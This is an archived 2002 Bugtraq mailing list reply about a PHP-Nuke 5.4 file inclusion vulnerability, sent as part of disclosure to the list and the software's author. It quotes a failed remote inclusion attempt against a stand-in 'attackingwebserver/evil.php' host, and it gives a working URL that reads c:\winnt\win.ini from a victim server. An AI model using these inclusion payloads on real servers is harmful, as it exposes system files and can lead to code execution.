Bugtraq mailing list archives

Re: PHP-Nuke allows Command Execution & Much more

From: RoMaNSoFt <roman () madrid com>
Date: Thu, 24 Jan 2002 17:18:08 +0100

On Mon, 21 Jan 2002 09:48:16 -0700 (MST), you wrote:

Roman,

I'll approve the post you sent yesterday.


 Dave, I haven't seen my post in bugtraq. Perhaps did you forget it?
I've included the fixed version of the post so you can directly cc to
bugtraq, if you consider it appropiate. Cheers.

 --Rom.

------------------------

 Hi. I did some quick tests on a php-nuke running on Apache for
*Windows*. PHPNuke version I tested was 5.4 (which is the last release
of phpnuke at the time of testing). I couldn't reproduce your exploit.
I always get something like:

Warning: Failed opening 'http://attackingwebserver/evil.php&apos; for
inclusion (include_path='') in c:\php\index.php on line 113

 Nevertheless I realized that this other URL works:
http://victimserver/index.php?file=c:\winnt\win.ini

 The former exploit shows the contens of win.ini file. At least it
worked for me :-)

 Since phpnuke  tested version is the last version at the time of
writing, I cc'ed this to Francisco Burzi (phpnuke author) 'cause it
seems like new stuff. This happened during last week.

Greetz,
 --RoMaNSoFt

Current thread:

PHP-Nuke allows Command Execution & Much more Handle Nopman (Jan 16)
- <Possible follow-ups>
- Re: PHP-Nuke allows Command Execution & Much more truff (Jan 21)
- Re: PHP-Nuke allows Command Execution & Much more RoMaNSoFt (Jan 24)